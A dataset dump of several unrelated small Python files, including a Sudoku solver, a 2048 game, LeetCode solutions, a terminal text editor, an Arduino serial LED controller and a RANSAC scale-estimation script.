    def archive_done_cards(self, resource_service, list_name, board_date):
        """Create today's archive list on the team board and move every
        card from `list_name` into it."""
        board_name = utils.make_target_board_name(self.team_info['start_ym'], board_date)
        board_id = resource_service.get_board_id(self.team_info['organ_name'], board_name)
        archived_list_id = resource_service.create_archived_list(
            board_id, utils.make_archived_list_name(self.today))
        done_list_id = resource_service.get_list_id(board_id, list_name)
        resource_service.move_done_cards(board_id, done_list_id, archived_list_id)

    def _check_valid_init_input(self):
        """Raise ValueError/TypeError when the constructor input is bad."""
        if not self.team_info or not self.today:
            raise ValueError('There are no initial input values')
        if 'start_ym' not in self.team_info or 'organ_name' not in self.team_info:
            raise ValueError('Wrong team information(start_ym or organ_name do not exist)')
        if not isinstance(self.today, date):
            raise TypeError('Wrong date format of today(datetime.date)')
        if re.search(r'^\d{4}-\d{2}$', self.team_info['start_ym']) is None:
            raise ValueError('Wrong team start_ym format(yyyy-mm)')
| true |
1bfd3d973ec3a5c9385ee9f1f7093530b5ef72d8 | Python | S1lenix/PythonLabs | /Python3/tempCodeRunnerFile.py | UTF-8 | 211 | 2.515625 | 3 | [] | no_license | def tochkanapryamoy():
    # Parse the line "k x b": text before 'x' is the slope, after it the
    # intercept (e.g. "2x+3" -> k=2.0, b=3.0).
    k,b = map(float, input().split('x'))
    # Parse the point as "x;y".
    x,y = map(float, input().split(';'))
    # Print True/False: does the point satisfy y = k*x + b exactly?
    # NOTE(review): exact float equality - tiny rounding errors yield False.
    if k*x+b==y:
        print(True)
    else:
        print(False)
# Run once on import/execution.
tochkanapryamoy()
| true |
7b8d1f3eac79a5508d8fe825847b601f0a03afec | Python | JumboSoftware/PYGO | /PYGO/src/app.py | UTF-8 | 3,463 | 3.421875 | 3 | [] | no_license | import random
import os
# welcome to pygo's source code
startup_message = """
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pygo V1
Made by Jumbo
Owned by Jumbo
Welcome to Pygo, a Text Editor.
If you are new, please execute 'help' to get started.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
help_ = """
~~ IN TERMINAL
help - Returns List of Available Commands
pygo.start - Enter the Editor
pygo.end - Exit Pygo
~~ IN EDITOR:
pygo.exit - Exit the Edtor
pygo.save - Save the File
"""
# for terminal
terminal_name = 'v1.pygo@terminal:~$ '  # prompt shown before every command
modeList = """
r - Read File
A new file will be generated if the file does not already exist.
a - Append Data to File
A new file will be generated if the file does not already exist.
x - Create New File
If the file already exists, the creation process will fail.
"""
# terminal
def PygoTerminal():
    """Interactive terminal loop: dispatches 'help', 'pygo.start'
    (open the editor) and 'pygo.end' (quit); blank input is ignored."""
    global cmd_format
    cmd_format = f"{terminal_name}"
    print(startup_message)
    while True:
        cmd = input(cmd_format)
        if cmd == 'help':
            print(help_)
            continue
        # open editor
        elif cmd == 'pygo.start':
            PygoEditor()
            break
        # end session
        elif cmd == 'pygo.end':
            break
        # Ignore empty / whitespace-only input.
        # BUG FIX: the original tested `cmd == '' or ' '`; a bare
        # non-empty string literal is always truthy, so this branch
        # matched every unknown command and the error message below was
        # unreachable.
        elif not cmd.strip():
            continue
        else:
            print('\nInvalid Command. Please use \'help\' if you are lost.\n')
            continue
# editor
def PygoEditor(*pygo_extensions):
    """Prompt for a file path and a mode (r/a/x), then read, append to,
    or create the file.  Control returns to the terminal by *recursively*
    calling PygoTerminal() from many branches - NOTE(review): this grows
    the call stack on every round-trip; confirm that is intentional.
    """
    # for extensions
    extensions = [pygo_extensions]
    # select file
    while True:
        global path
        path = input('\nENTER FILE PATH OR USE A FILE NAME FOR A LOCAL FILE OR EXECUTE \'cancel\' TO RETURN TO THE TERMINAL: ')
        if path == 'cancel':
            PygoTerminal()
            break
        elif len(path) == 0:
            print('\nNo File Chosen.')
            PygoTerminal()
            break
        else:
            # choose mode
            print(modeList)
            global mode
            while True:
                mode = input('\nSELECT MODE OR EXECUTE \'cancel\' TO RETURN TO THE TERMINAL: ')
                if mode == 'cancel':
                    PygoTerminal()
                    break
                else:
                    # for invalid files
                    if '.' not in path:
                        print('\nFile must have an extension.')
                        # return to terminal, this will be used some more
                        PygoTerminal()
                    else:
                        # Open with the user-chosen mode string directly.
                        file = open(f"{path}", f"{mode}")
                        # this will hold the text
                        global per_line
                        per_line = '~ '
                        global data
                        data = ""
                        # mode checking
                        if mode == 'r':
                            print(file.read())
                            PygoTerminal()
                        elif mode == 'a':
                            while True:
                                global text
                                text = input(f'{per_line}' + ' ')
                                # text and data are seperate variables so that every time the user enters a line of code, the text is added to the data variable along with a newline escape, otherwise, all of the text entered would be gathered into one line
                                data += (text + '\n')
                                # save file and return to terminal
                                if text == 'pygo.save':
                                    file.write(data)
                                    PygoTerminal()
                                    break
                                elif text == 'pygo.exit':
                                    file.write(data)
                                    PygoTerminal()
                                    break
                        # create new file
                        elif mode == 'x':
                            new_file_name = input('\nCREATE NEW FILE: ')
                            new_file = open(f"{new_file_name}", 'x')
                            print()
                            PygoTerminal()
                            break
                        else:
                            print('\nInvalid Mode Choice.\n')
                            PygoTerminal()
                            break
                    PygoTerminal()
                    break
            PygoTerminal()
            break
    PygoTerminal()
# nothing else here
| true |
a012171140b5572067cce232499f2f175c9b4d91 | Python | keiraaaaa/Leetcode | /Jun_14.py | UTF-8 | 2,433 | 3.59375 | 4 | [
"MIT"
] | permissive | '''
############################
# 142. Linked List Cycle II
############################
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def detectCycle(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head or not head.next:
return None
slow, fast = head, head
while fast.next!=None and fast.next.next!=None:
slow = slow.next
fast = fast.next.next
if fast == slow:
cycle = True
break;
if fast.next==None or fast.next.next==None:
return None
else:
# return True
slow_new = head
while slow_new != slow:
slow_new = slow_new.next
slow = slow.next
return slow
x = []
x = ListNode(1)
# x.next = ListNode(2)
# x.next.next = ListNode(3)
# x.next.next.next = x.next
solu = Solution()
# print (x.next.next.next.val)
print (solu.detectCycle(x))
'''
###################
# 148. Sort List
###################
# Definition for singly-linked list.
class ListNode:
    """A single node of a singly linked list."""

    def __init__(self, x):
        self.next = None
        self.val = x


class Solution:
    """LeetCode 148: sort a linked list with top-down merge sort."""

    def merge(self, l1, l2):
        """Merge two sorted lists and return the head of the result."""
        sentinel = ListNode(0)
        cursor = sentinel
        while l1 is not None and l2 is not None:
            if l2.val < l1.val:
                cursor.next = l2
                l2 = l2.next
            else:
                cursor.next = l1
                l1 = l1.next
            cursor = cursor.next
        # At most one list still has nodes; append it whole.
        cursor.next = l1 if l2 is None else l2
        return sentinel.next

    def sortList(self, head):
        """Split the list at the middle with slow/fast pointers, sort the
        halves recursively, then merge them."""
        if head is None or head.next is None:
            return head
        slow = fast = head
        while slow.next and fast.next and fast.next.next:
            slow = slow.next
            fast = fast.next.next
        second = slow.next
        slow.next = None
        return self.merge(self.sortList(head), self.sortList(second))
# Ad-hoc check: sort the list 4 -> 2 -> 1 -> 3 and print the new head (1).
x = ListNode(4)
x.next = ListNode(2)
x.next.next = ListNode(1)
x.next.next.next = ListNode(3)
solu = Solution()
s = solu.sortList(x)
print (s.val)
| true |
15135129dc3bcc05393d137bab65b84e2bc25000 | Python | mattkim8/CSI | /sudoku.py | UTF-8 | 6,178 | 3.78125 | 4 | [] | no_license | # Problem Set 8
# Name: Kim, Matthew
# Collaborators: last name1, first name1; last name2, first name2; etc.
# Description: A solver for the Sudoku puzzle
import sys
def grid_display(board):
    """Display the board as a nice grid on the screen."""
    # Python 2 print statements: a trailing comma suppresses the newline;
    # a tab and a blank line separate the 3x3 clusters visually.
    for j in range(9):
        for k in range(9):
            print board[j][k],
            if k%3 == 2:
                print '\t',
        print
        if j%3 == 2:
            print
    return None
def set_board(list_of_lines):
    """Build the board - a tuple of row tuples of ints - from the lines
    read from the input file."""
    rows = ()
    for line in list_of_lines:
        rows += (tuple(int(token) for token in line.split()), )
    return rows
def load_file(filename):
    # Open the board file, build the board from its lines, and always run
    # the finally clause (it executes even while sys.exit's SystemExit
    # propagates).
    # NOTE(review): if open() itself fails, file_object is unbound and the
    # finally clause raises NameError - confirm whether that matters here.
    try:
        # Open the selected file in read mode.
        file_object = open(filename, 'r')
    except IOError as err_msg:
        print "Couldn't open the file!", err_msg
        sys.exit()
    else:
        # Use the lines in the file to create the board.
        lines = file_object.readlines()
        board = set_board(lines)
        return board
    finally:
        file_object.close()
##############################################################################
# Complete the following functions
##############################################################################
def is_safe(board, row, column, x):
    """Return True when digit x may be placed at (row, column), 1-based,
    without breaking the row, column or cluster constraints.

    BUG FIX: the original ignored x entirely and only validated the
    *current* board, so every candidate digit was accepted and the
    solver could not reject anything.  Validate the board with x
    hypothetically placed instead.
    """
    candidate = place(board, row, column, x)
    return (column_check(candidate, column)
            and row_check(candidate, row)
            and cluster_check(candidate, row, column))
def column_check(board, column):
    """Check the board at the given column index (1-based) to verify that
    the column contains no repeated digit 1-9.

    BUG FIX: the original located values with list(i).index(j), i.e. the
    first *index of the value* inside the row rather than the value at
    the column position; any row containing duplicate values polluted
    the collected column and produced false negatives.
    """
    values = [row[column-1] for row in board]
    for x in range(1, 10):
        if values.count(x) > 1:
            return False
    return True
def row_check(board, row):
    """Check the board at the given row index (1-based) to verify that
    the row contains no repeated digit 1-9.

    BUG FIX: the original's loop body ended with `else: return True`, so
    it returned on the very first iteration and only ever detected
    duplicate 1s; duplicates of 2-9 passed unnoticed.
    """
    values = list(board[row-1])
    for x in range(1, 10):
        if values.count(x) > 1:
            return False
    return True
def cluster_check(board, row, column):
    """Check that the 3x3 cluster containing (row, column), 1-based, has
    no repeated digit 1-9.

    BUG FIX: like row_check, the original's digit loop ended with
    `else: return True` and therefore only ever tested the digit 1.
    The cluster selection is also computed arithmetically instead of via
    three hand-written slicing branches per axis.
    """
    top = ((row - 1) // 3) * 3
    left = ((column - 1) // 3) * 3
    cells = []
    for r in range(top, top + 3):
        cells.extend(board[r][left:left + 3])
    for x in range(1, 10):
        if cells.count(x) > 1:
            return False
    return True
def place(board,row,column,x):
    """Return a new board with digit x placed at (row, column), 1-based.

    The input board (a tuple of row tuples) is left untouched.
    """
    rows = list(board)
    target = rows[row-1]
    rows[row-1] = target[:column-1] + (x, ) + target[column:]
    return tuple(rows)
def first_empty(board):
    """Return a tuple (row, col) which represents the row and
    column of an empty cell (one that has the value zero). If no
    such cell exists (which means the puzzle is solved), return
    None.

    Idiom fix: use enumerate instead of the original value-based
    list(...).index(...) lookups, which are fragile in the presence of
    duplicate rows/values (they find the first occurrence of a *value*,
    not the position being inspected).
    """
    for r, row_values in enumerate(board):
        for c, value in enumerate(row_values):
            if value == 0:
                return (r + 1, c + 1)
    return None
def sudoku_solve(board):
    """Call this function to solve the Sudoku board.
    It should call the recursive function solve_helper.

    BUG FIX: the original always started solve_helper at (1, 1), which
    made the solver overwrite a given clue in the top-left cell; start
    at the first actually-empty cell instead.
    """
    empty_cell = first_empty(board)
    if empty_cell == None:
        return board
    return solve_helper(board, empty_cell[0], empty_cell[1])
def solve_helper(board, row, col):
    """Recursive backtracking step: try each digit at (row, col), recurse
    into the next empty cell, and return a solved board or None."""
    # A board with no empty cell is already solved.
    if first_empty(board) == None:
        return board
    for x in range (1, len(board)+1):
        if is_safe(board, row, col, x):
            new_board = place(board,row,col,x)
            empty_cell = first_empty(new_board)
            # Placing x may have filled the last empty cell.
            if first_empty(new_board) == None:
                solution = new_board
                return solution
            solution = solve_helper(new_board,empty_cell[0],empty_cell[1])
            if solution != None:
                return solution
    # No digit works here: signal the caller to backtrack.
    return None
######__main__
# NOTE(review): these module-level asserts run on import and require an
# 'easy.txt' board file next to the script.
#### Test 1: Please do not change the following four lines. If you're getting
# an error here, it means one of the following functions is not working
# properly: row_check, column_check, cluster_check
new_board = place(load_file('easy.txt'), 1, 1, 1)
assert row_check(new_board, 1), 'Row check failed!'
assert column_check(new_board, 1), 'Column check failed!'
assert cluster_check(new_board, 1, 1), 'Cluster check failed!'
#### Test 2: Please do not change the following four lines. If you're getting
# an error here, it means one of the following functions is not working
# properly: row_check, column_check, cluster_check
new_board = place(load_file('easy.txt'), 3, 7, 3)
assert not row_check(new_board, 3), 'Row check failed!'
assert column_check(new_board, 7), 'Column check failed!'
assert not cluster_check(new_board, 3, 7), 'Cluster check failed!'
### Update the file name below accordingly.
### Choices: 'easy.txt' 'moderate.txt' 'hard.txt'
board = load_file('easy.txt')
# The function call to solve the Sudoku puzzle.
solution = sudoku_solve(board)
# The function call to display the solution board.
grid_display(solution)
| true |
5b5b850f1a511916b0a528cc5c0b6e07f55aa217 | Python | swanhack/lightbot | /py/FresherUno.py | UTF-8 | 3,397 | 2.78125 | 3 | [] | no_license | import serial
import time
from time import sleep
import threading
import asyncio
# Serial signals
SSIG_DISCORD_JOIN = 1
SSIG_SET_DEFAULT_COLOUR = 2
SSIG_QUERY_STATE = 3
# Colour Macros
SWAN_HACK_GREEN = (0x00, 0xFF, 0x02)
class FresherUno:
def __init__(self, serPort, serSpeed):
self.serialCon = serial.Serial(serPort, serSpeed, timeout=15, write_timeout=15)
# Wait for serial to initialise
sleep(3)
self.lock = threading.Lock()
self.defaultColour = SWAN_HACK_GREEN
self.__sendSetDefaultColour(self.defaultColour[0],
self.defaultColour[1],
self.defaultColour[2])
def discordBlink(self, times, accentColour):
self.__sendDiscordBlink(accentColour[0], accentColour[1], accentColour[2], times)
def setDefaultColour(self, colour):
self.defaultColour = colour
self.__sendSetDefaultColour(colour[0], colour[1], colour[2])
async def setTemporaryColour(self, colour, totalSec = 30):
self.__sendSetDefaultColour(colour[0], colour[1], colour[2])
# Run the wait asynchronously
loop = asyncio.get_running_loop()
out = loop.run_in_executor(None, self.__waitAndResetDefaultColour, totalSec)
def queryCurrentColour(self):
self.lock.acquire()
self.serialCon.write(bytearray([SSIG_QUERY_STATE]))
RGB_BYTE_SIZE = 3
currentStateBytes = self.serialCon.read(RGB_BYTE_SIZE)
self.lock.release()
if not len(currentStateBytes) == RGB_BYTE_SIZE:
raise RuntimeError("didn't read full rgb state string from arduino")
currentState = (currentStateBytes[0], currentStateBytes[1],
currentStateBytes[2])
return currentState
def __waitAndResetDefaultColour(self, timeout):
knownTimeWhenDefaultChangedLast = self.__timeDefaultChangedLast
sleep(timeout)
if self.__timeDefaultChangedLast == knownTimeWhenDefaultChangedLast:
self.__sendSetDefaultColour(self.defaultColour[0],
self.defaultColour[1],
self.defaultColour[2])
def __sendDiscordBlink(self, accentR, accentG, accentB, times):
self.lock.acquire()
self.serialCon.write(bytearray([SSIG_DISCORD_JOIN,
accentR,
accentG,
accentB,
times]))
self.lock.release()
def __sendSetDefaultColour(self, r, g, b):
self.lock.acquire()
self.__timeDefaultChangedLast = int(time.time())
self.serialCon.write(bytearray([SSIG_SET_DEFAULT_COLOUR,
r,
g,
b]))
self.lock.release()
| true |
ba10df750bbe383166524715c6cbf7448bfd1d70 | Python | ShubhamWaghilkar/python | /healthy programmer.py | UTF-8 | 2,682 | 3.125 | 3 | [] | no_license | import pygame
import time
import datetime
from pygame import mixer
current_time = time.strftime("%H:%M:%S")
work_start_time = '09:00:00'
work_end_time = '24:00:00'
water_limit = 200
glass_size = 5
no_of_glass = round(water_limit/glass_size)
total_work = 60 #8hours
water_interval = (total_work/no_of_glass)
eye_count =0
pys = 0
eye_interval = 60 ##30minutes
phy_interval = 60 ##45minutes
def playsong():
mixer.init()
mixer.music.load("wa.mp3")
print("loaded")
mixer.music.play()
mixer.music.set_volume(1.0)
print("music playing")
#
# user = input("Pleae select yes an no to start the program")
# user = user.lower()
# if user =="yes":
# while current_time > work_start_time and current_time < work_end_time:
# if water_count == 28 and water_count == 60:
# playsong()
# wat= input("to stop remainder hit 'drank'")
# wat = wat.lower()
# if wat == "drank":
# mixer.music.stop()
# f = open("water.txt","a")
# f.write(f"logged {datetime.datetime.now()} drank water")
# print("Music stop")
# break
#
def wr(file,text):
f = open(file,"a")
f.write(f"[ " + str(datetime.datetime.now()) + "] : "+ text)
f.close()
def water(glass):
i = ""
while(i is not 'drank'):
playsong()
print("\n", end="")
i = input("did you drank water type yes if drank").lower()
if i == "drank":
wr('water.text','Dranked')
mixer.music.stop()
time.sleep(water_interval)
break
def eye():
i = ""
while(i is not "done"):
playsong()
print("\n", end="")
i = input("have taken break from the screen").lower()
if i == "done":
wr('eye.txt', 'eyeBreak Taken')
mixer.music.stop()
time.sleep(eye_interval)
break
def phy():
i = ""
while(i is not "ex"):
playsong()
print("\n ", end="")
i = input("Have you done the exercise").lower()
if i == "ex":
wr('phy.txt','exercise Done')
mixer.music.stop()
time.sleep(phy_interval)
break
try:
glass = 0
while(current_time is not work_end_time):
if current_time>=work_start_time and current_time<= work_end_time:
if glass == no_of_glass:
pass
else:
water(glass)
glass +=1
eye()
phy()
current_time = time.strftime("%H:%M:%S")
print(glass)
except Exception as e:
print("something wrong")
| true |
ee628766088e2ce2e811630d9812b75076d0f23a | Python | vishnupsatish/CCC-practice | /2018/J5/J5_not_correct.py | UTF-8 | 1,622 | 2.859375 | 3 | [] | no_license | def minus1(num):
return num - 1
pages = int(input())
# One input line per page: the targets reachable from that page, shifted
# to 0-based via minus1 (so an input "0" becomes -1, the end marker).
temp_pages_reachable = [list(map(minus1, list(map(int, input().split())))) for _ in range(pages)]
pages_reachable = []
end_pages = []
visited = dict()
for page in range(len(temp_pages_reachable)):
    if temp_pages_reachable[page][0] == -1:
        end_pages.append(page)
    # De-duplicate targets; NOTE(review): set() loses the original order.
    pages_reachable.append(list(set(temp_pages_reachable[page])))
    visited[page] = []
del temp_pages_reachable
visited[-1] = []
# Sentinel larger than any achievable step count.
shortest_step = 10000000000000000000
def main(page_no, steps=0):
    """DFS from `page_no`, recording in the global `shortest_step` the
    minimum depth at which the end marker (-1) is reached.

    BUG FIX: the original decremented the local `steps` after every
    recursive call, so later siblings in the loop were explored with an
    understated depth; `steps` must stay constant across siblings (each
    child simply receives steps + 1).
    NOTE(review): when page_no == -1 the loop still indexes
    pages_reachable[-1] (the last page's list) - presumably it should
    return instead; confirm against the original problem.
    """
    global shortest_step
    if page_no == -1 and steps < shortest_step:
        shortest_step = steps
    for reachable in pages_reachable[page_no]:
        if reachable in visited[page_no]:
            continue
        visited[page_no].append(reachable)
        main(reachable, steps=steps+1)
main(0)
# "N" when some page's adjacency list was never entered, otherwise "Y"
# (the for-else fires only when the loop completes without break).
for key in visited:
    if len(visited[key]) == 0:
        print("N")
        break
else:
    print("Y")
print(shortest_step)
#-------------------------------------------------------------------------------------------------
# Wrong answer below
# def bfs():
# visited_ = dict()
# q = [0]
# visited_[0] = True
# for page in range(pages):
# visited_[page] = False
# visited_[-1] = False
# level = 0
# ans = 238929843743738
# while q:
#
# now = pages_reachable[q.pop(0)]
#
# for v in now:
# if not visited_[v]:
# visited_[v] = True
# q.append(v)
# # print(v + 1, level, end="\n")
# if v == -1:
# return len(q)
# level -= 1
# level += 1
# def bfs(nodes, level):
# level += 1
# for node in nodes:
# node_ = pages_reachable[node]
# if -1 in node_:
# return level
# return bfs(node_, level) | true |
2eb6b8ec9c7e9a8463baa5a57c84aaa4e8978a50 | Python | LawrenceGao0224/LeetCode | /two_sum.py | UTF-8 | 795 | 3.265625 | 3 | [] | no_license | from typing import List
class Solution:
    """LeetCode 1 (sort + two-pointer variant): indices of the two
    numbers that sum to the target."""

    def twoSum(self, nums: List[int], target: int) -> List[int]:
        """Close in on the target pair over a sorted copy, then map the
        pair of values back to indices in the original list.

        Assumes exactly one solution exists (LeetCode guarantee)."""
        ordered = sorted(nums)
        lo, hi = 0, len(ordered) - 1
        while hi > lo:
            pair_sum = ordered[lo] + ordered[hi]
            if pair_sum > target:
                hi -= 1
            elif pair_sum < target:
                lo += 1
            else:
                break
        # ordered[lo] / ordered[hi] now hold the two wanted values.
        wanted_a, wanted_b = ordered[lo], ordered[hi]
        res = []
        for index, value in enumerate(nums):
            if value == wanted_a or value == wanted_b:
                res.append(index)
                if len(res) == 2:
                    break
        return res
# Quick manual check: 2 + 7 == 9, so the expected output is [0, 1].
number = [2,7,11,5]
target = 9
a = Solution()
print(a.twoSum(number,target))
| true |
68e5787e380035558cc12d269e64d57bd7e46052 | Python | PawaN-K-MishrA/2048_Game | /logic.py | UTF-8 | 3,572 | 3.453125 | 3 | [] | no_license | import random
#game starting function
def start_game():
    """Return a fresh 4x4 board filled with zeros."""
    return [[0] * 4 for _ in range(4)]
#adding new 2 at random function
def add_new2(mat):
    """Place a 2 in a uniformly-random empty (zero) cell, in place, and
    return the board."""
    while True:
        row = random.randint(0, 3)
        col = random.randint(0, 3)
        if mat[row][col] == 0:
            break
    mat[row][col] = 2
    return mat
#getting the current state of function
def get_curr_state_of_game(mat):
    """Classify the 4x4 board: 'WON' if 2048 is present,
    'GAME NOT OVER.' if a move is still possible (an empty cell or two
    equal adjacent tiles), otherwise 'LOST'."""
    if any(2048 in row for row in mat):
        return 'WON'
    if any(0 in row for row in mat):
        return 'GAME NOT OVER.'
    # Any equal vertical neighbours?
    if any(mat[i][j] == mat[i + 1][j] for i in range(3) for j in range(4)):
        return 'GAME NOT OVER.'
    # Any equal horizontal neighbours?
    if any(mat[i][j] == mat[i][j + 1] for i in range(4) for j in range(3)):
        return 'GAME NOT OVER.'
    return 'LOST'
#moving the non 0 elemnts left and 0 elements on right
def compress(mat):
    """Slide every non-zero entry of each row to the left, zero-filling
    the rest. Returns (new_matrix, changed), where changed reports
    whether any tile actually moved."""
    changed = False
    result = [[0] * 4 for _ in range(4)]
    for row in range(4):
        write = 0  # next free slot in this row
        for col in range(4):
            value = mat[row][col]
            if value == 0:
                continue
            result[row][write] = value
            if col != write:
                changed = True
            write += 1
    return result, changed
#merging the similar elements
def merge(mat):
    """Combine equal horizontal neighbours left-to-right *in place*:
    the left cell doubles and the right becomes 0.
    Returns (mat, changed)."""
    changed = False
    for row in range(4):
        for col in range(3):
            value = mat[row][col]
            if value != 0 and value == mat[row][col + 1]:
                mat[row][col] = value * 2
                mat[row][col + 1] = 0
                changed = True
    return mat, changed
#reverse a matrix
def reverse(mat):
    """Return a new matrix with every row reversed."""
    return [row[::-1] for row in mat]
#transpose of mat
def transpose(mat):
    """Return the transpose of the 4x4 matrix as a new list of lists."""
    return [[mat[j][i] for j in range(4)] for i in range(4)]
def move_up(grid):
    """Apply an 'up' move: perform a left move (compress, merge,
    compress) on the transpose and transpose back.
    Returns (new_grid, changed)."""
    working = transpose(grid)
    working, moved = compress(working)
    working, merged = merge(working)
    working, _ = compress(working)
    return transpose(working), moved or merged
def move_down(grid):
    """Apply a 'down' move: transpose, reverse each row, perform a left
    move, then undo the reversal and transposition.
    Returns (new_grid, changed)."""
    working = reverse(transpose(grid))
    working, moved = compress(working)
    working, merged = merge(working)
    working, _ = compress(working)
    return transpose(reverse(working)), moved or merged
def move_right(grid):
    """Apply a 'right' move: reverse each row, perform a left move, then
    reverse back. Returns (new_grid, changed)."""
    working = reverse(grid)
    working, moved = compress(working)
    working, merged = merge(working)
    working, _ = compress(working)
    return reverse(working), moved or merged
def move_left(grid):
    """Apply a 'left' move: compress, merge equal neighbours, compress
    again. Returns (new_grid, changed)."""
    working, moved = compress(grid)
    working, merged = merge(working)
    working, _ = compress(working)
    return working, moved or merged
ee761a12c29ebf2448076359b6c6f3ffdc58224b | Python | cofinoa/cfdm | /cfdm/core/data/numpyarray.py | UTF-8 | 2,439 | 2.96875 | 3 | [
"MIT"
] | permissive | from builtins import super
import numpy
from . import abstract
class NumpyArray(abstract.Array):
    '''A container for a numpy array.

    .. versionadded:: 1.7.0

    '''

    def __init__(self, array=None):
        '''**Initialization**

        :Parameters:

            array: `numpy.ndarray`
                The numpy array to be contained.

        '''
        super().__init__(array=array)

    @property
    def dtype(self):
        '''Data-type of the data elements.

        .. versionadded:: 1.7.0

        **Examples:**

        >>> a.dtype
        dtype('float64')

        '''
        return self._get_component('array').dtype

    @property
    def ndim(self):
        '''Number of array dimensions.

        .. versionadded:: 1.7.0

        **Examples:**

        >>> a.shape
        (73, 96)
        >>> a.ndim
        2
        >>> a.shape
        ()
        >>> a.ndim
        0

        '''
        return self._get_component('array').ndim

    @property
    def shape(self):
        '''Tuple of array dimension sizes.

        .. versionadded:: 1.7.0

        **Examples:**

        >>> a.shape
        (73, 96)
        >>> a.shape
        ()

        '''
        return self._get_component('array').shape

    @property
    def size(self):
        '''Number of elements in the array.

        .. versionadded:: 1.7.0

        **Examples:**

        >>> a.shape
        (73, 96)
        >>> a.size
        7008
        >>> a.shape
        ()
        >>> a.size
        1

        '''
        return self._get_component('array').size

    @property
    def array(self):
        '''Return an independent numpy array containing the data.

        .. versionadded:: 1.7.0

        :Returns:

            `numpy.ndarray`
                An independent numpy array of the data.

        **Examples:**

        >>> n = numpy.asanyarray(a)
        >>> isinstance(n, numpy.ndarray)
        True

        '''
        data = self._get_component('array')
        if data.ndim or not numpy.ma.isMA(data):
            return data.copy()
        # numpy.ma.copy doesn't work for scalar (0-d) masked arrays (at
        # the moment, at least), so build a fresh 0-d masked array and
        # fill it instead.
        fresh = numpy.ma.empty((), dtype=data.dtype)
        fresh[...] = data
        return fresh
| true |
93ff28f109cf329e20b3b2adb759ade990a8756d | Python | Aashish2023/Hactoberfest2021 | /mile2km.py | UTF-8 | 871 | 3.1875 | 3 | [] | no_license | from tkinter import *
# Build the main application window for the converter GUI.
win = Tk()
win.minsize(300,200)
win.title("MILE TO KM CONVERTOR")
def mile2km(val):
    """Convert miles to kilometres, rounded to 2 decimal places.

    `val` may be a number or a numeric string (the Tk Entry widget
    yields strings). The previous version used int(), which raised
    ValueError on decimal input such as "1.5" and silently truncated
    fractional miles; float() handles both correctly.
    """
    km = float(val)*1.6
    return round(km,2)
def click():
    """Handler for the Calculate button: read miles, display kilometres.

    Reads the module-level `mile_value` Entry and writes the converted
    value into the `ans_km` Label.
    """
    miles = mile_value.get()
    converted = mile2km(miles)
    ans_km.config(text=str(converted))
########################################################
# Lay out the widgets: "<miles> MILE is equal to <km> KM".
isequaltext=Label(text="is equal to")
isequaltext.grid(column=0,row=2,padx=10,pady=10)
mile_value=Entry()
mile_value.grid(column=2,row=2,padx=5,pady=5)
topic_mile=Label(text="MILE")
topic_mile.grid(column=3,row=2)
topic_km=Label(text="KM")
topic_km.grid(column=3,row=3)
# Result label, updated by click().
ans_km=Label(text="0",font=("Arial",20,"bold"))
ans_km.grid(column=2,row=3)
button=Button(text="Calculate",font=("Arial",20,"bold"),command=click)
button.grid(column=2,row=4)
#########################################################
win.mainloop() | true |
4366af2326389a926e103eb162486c1b3dbee784 | Python | YuLin1226/RANSAC | /Project_1/scale_registration.py | UTF-8 | 3,223 | 2.609375 | 3 | [] | no_license | import random
import numpy as np
import math
import matplotlib.pyplot as plt
def _cal_distance(x1, y1, x2, y2):
return ((x1-x2)**2 + (y1-y2)**2)**0.5
def _ransac_find_scale(pts_set_1, pts_set_2, sigma, max_iter=1000):
    """RANSAC estimate of the scale ratio between two matched point sets.

    Each iteration samples two correspondences, computes the candidate
    ratio dist_1/dist_2, then counts how many points agree with that
    ratio (relative to the sample midpoints) within `sigma`. The ratio
    with the most inliers wins.

    NOTE(review): if the two sampled points coincide in pts_set_2,
    dist_2 is 0 and this raises ZeroDivisionError — confirm the caller
    guarantees distinct points. Same for dist_2_j == 0 in the inner loop.
    """
    length, _ = np.shape(pts_set_1)
    best_ratio = 0
    total_inlier, pre_total_inlier = 0, 0
    for i in range(max_iter):
        # Minimal sample: two distinct correspondences.
        index = random.sample(range(length), 2)
        x11 = pts_set_1[index[0], 0]
        y11 = pts_set_1[index[0], 1]
        x12 = pts_set_1[index[1], 0]
        y12 = pts_set_1[index[1], 1]
        x21 = pts_set_2[index[0], 0]
        y21 = pts_set_2[index[0], 1]
        x22 = pts_set_2[index[1], 0]
        y22 = pts_set_2[index[1], 1]
        dist_1 = _cal_distance(x11, y11, x12, y12)
        dist_2 = _cal_distance(x21, y21, x22, y22)
        # Midpoints of the sampled pair in each set; per-point ratios
        # below are measured from these.
        mean_1 = [(x11+x12)/2, (y11+y12)/2]
        mean_2 = [(x21+x22)/2, (y21+y22)/2]
        ratio = dist_1 / dist_2
        for j in range(length):
            x1j = pts_set_1[j,0]
            y1j = pts_set_1[j,1]
            x2j = pts_set_2[j,0]
            y2j = pts_set_2[j,1]
            dist_1_j = _cal_distance(mean_1[0], mean_1[1], x1j, y1j)
            dist_2_j = _cal_distance(mean_2[0], mean_2[1], x2j, y2j)
            ratio_j = dist_1_j / dist_2_j
            # `sigma` is an absolute tolerance on the ratio difference.
            if abs(ratio - ratio_j) < sigma:
                total_inlier += 1
        if total_inlier > pre_total_inlier:
            pre_total_inlier = total_inlier
            best_ratio = ratio
        # Reset the counter for the next hypothesis.
        total_inlier = 0
    return best_ratio
def _rot(theta):
x = theta / 180 * math.pi
T = np.array([
[math.cos(x), -math.sin(x)],
[math.sin(x), math.cos(x)]
])
return T
if __name__ == "__main__":
    # Monte-Carlo evaluation: n synthetic trials of recovering a known
    # scale factor (`ratio`) with the RANSAC estimator above.
    ratio = 3
    n = 1000
    times = 0
    for j in range(n):
        pts = []
        uncertain = []
        # 30 true correspondences, perturbed by uniform noise.
        for i in range(30):
            pts.append([
                random.randint(1, 100),
                random.randint(1, 100)
            ])
            uncertain.append([
                random.uniform(1.1, 5.4),
                random.uniform(1.1, 5.4)
            ])
        pts_np_1 = np.array(pts).T
        uncertain_np = np.array(uncertain).T
        # Second set = rotate 30 degrees, scale by `ratio`, add noise.
        pts_np_2 = _rot(30).dot(pts_np_1)*ratio + uncertain_np
